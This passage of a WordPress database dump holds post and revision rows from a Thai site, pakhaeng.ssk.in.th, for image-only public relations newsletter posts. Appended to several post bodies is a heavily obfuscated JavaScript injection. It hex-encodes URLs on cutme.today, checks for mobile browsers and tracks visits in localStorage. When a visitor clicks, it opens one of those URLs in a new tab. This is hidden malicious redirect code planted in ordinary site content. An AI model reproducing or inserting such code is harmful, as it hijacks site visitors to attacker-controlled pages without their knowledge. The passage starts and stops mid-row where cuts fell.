74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-2','','','2024-07-27 22:38:36','2024-07-27 15:38:36','',0,'http://pakhaeng.ssk.in.th/?p=191',0,'post','',0),
(192,1,'2024-07-27 22:38:18','2024-07-27 15:38:18','','2-2566','','inherit','','closed','','2-2566-2','','','2024-07-27 22:38:18','2024-07-27 15:38:18','',191,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/2-2566-1.png',0,'attachment','image/png',0),
(193,1,'2024-07-27 22:38:34','2024-07-27 15:38:34','<!-- wp:image {\"id\":192,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/2-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-192\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','191-revision-v1','','','2024-07-27 22:38:34','2024-07-27 15:38:34','',191,'http://pakhaeng.ssk.in.th/?p=193',0,'revision','',0),
(194,1,'2024-07-27 22:39:06','2024-07-27 15:39:06','<!-- wp:image {\"id\":195,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-1-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-195\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 